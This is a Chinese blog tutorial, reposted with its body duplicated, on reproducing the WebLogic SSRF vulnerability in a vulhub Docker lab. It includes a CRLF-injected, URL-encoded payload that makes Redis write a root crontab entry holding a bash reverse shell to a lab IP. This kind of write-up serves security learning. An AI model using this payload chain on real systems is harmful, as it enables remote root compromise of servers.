weblogic ssrf漏洞复现

其他 2021-03-07 09:45:54 阅读次数: 0

采用的虚拟机环境为ubuntu16.04,在虚拟机上搭建好docker环境。采用的vulhub来进行复现。
使用git来下载,命令为git clone https://github.com/vulhub/vulhub.git
在这里插入图片描述
进入ssrf漏洞中,
cd /vulhub/weblogic/ssrf
在这里插入图片描述
创建漏洞环境
docker-compose up -d
在这里插入图片描述
查看容器
docker ps
在这里插入图片描述
虚拟机地址为192.168.6.136,访问http://192.168.6.136:7001/uddiexplorer/SearchPublicRegistries.jsp
在这里插入图片描述
成功创建漏洞环境。

ssrf漏洞测试
打开代理工具拦截http请求包

在这里插入图片描述
可以看到参数中存在一个网址,将参数改为http://192.168.6.136:7001
在这里插入图片描述
再访问一个不存在的端口
在这里插入图片描述
从两次不同的http请求包结果中可知,weblogic中存在这ssrf漏洞。
查看weblogic容器的地址
docker inspect 642ac3b75ae8
在这里插入图片描述
同理 docker inspect fe0822abff42
在这里插入图片描述
注入HTTP头,利用Redis的反弹shell
通过SSRF探测内网中的Redis的服务器
在这里插入图片描述
想redis服务器发送命令
set 1 “\n\n\n\n* * * * * root bash -i >& /dev/tcp/监听ip/port 0>&1\n\n\n\n”
config set dir /etc/
config set dbfilename crontab
save
利用回车换行将三条命令连接,换行符号的url编码为%od%oa,注入的代码为
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.19.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
在虚拟机中监听,容器的网关为172.19.0.1,即为虚拟机的地址。
在这里插入图片描述
发包
在这里插入图片描述
成功得到shell。
在这里插入图片描述
到此,漏洞成功复现。

采用的虚拟机环境为ubuntu16.04,在虚拟机上搭建好docker环境。采用的vulhub来进行复现。
使用git来下载,命令为git clone https://github.com/vulhub/vulhub.git
在这里插入图片描述
进入ssrf漏洞中,
cd /vulhub/weblogic/ssrf
在这里插入图片描述
创建漏洞环境
docker-compose up -d
在这里插入图片描述
查看容器
docker ps
在这里插入图片描述
虚拟机地址为192.168.6.136,访问http://192.168.6.136:7001/uddiexplorer/SearchPublicRegistries.jsp
在这里插入图片描述
成功创建漏洞环境。

ssrf漏洞测试
打开代理工具拦截http请求包

在这里插入图片描述
可以看到参数中存在一个网址,将参数改为http://192.168.6.136:7001
在这里插入图片描述
再访问一个不存在的端口
在这里插入图片描述
从两次不同的http请求包结果中可知,weblogic中存在这ssrf漏洞。
查看weblogic容器的地址
docker inspect 642ac3b75ae8
在这里插入图片描述
同理 docker inspect fe0822abff42
在这里插入图片描述
注入HTTP头,利用Redis的反弹shell
通过SSRF探测内网中的Redis的服务器
在这里插入图片描述
想redis服务器发送命令
set 1 “\n\n\n\n* * * * * root bash -i >& /dev/tcp/监听ip/port 0>&1\n\n\n\n”
config set dir /etc/
config set dbfilename crontab
save
利用回车换行将三条命令连接,换行符号的url编码为%od%oa,注入的代码为
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.19.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
在虚拟机中监听,容器的网关为172.19.0.1,即为虚拟机的地址。
在这里插入图片描述
发包
在这里插入图片描述
成功得到shell。
在这里插入图片描述
到此,漏洞成功复现。

猜你喜欢

转载自blog.csdn.net/weixin_44110913/article/details/109540218
今日推荐
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
周排行
rbac——界面、权限
Apache CXF + SpringMVC 整合发布WebService
so插件化
Vue.js实战系列---图标字体制作(svg格式)
PAT乙级 1007 素数对猜想(孪生素数对) (20分) ---(C语言 + 详细注释)
被IRM保护的文档,打开失败
Calendar和Date计算日期差的小问题
win10子系统ubuntu18.4安装docker
利用Wrap Shell Script定位Android Native内存泄漏
MySQL: Transaction (Part I - Basic Concept)
每日归档
更多
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022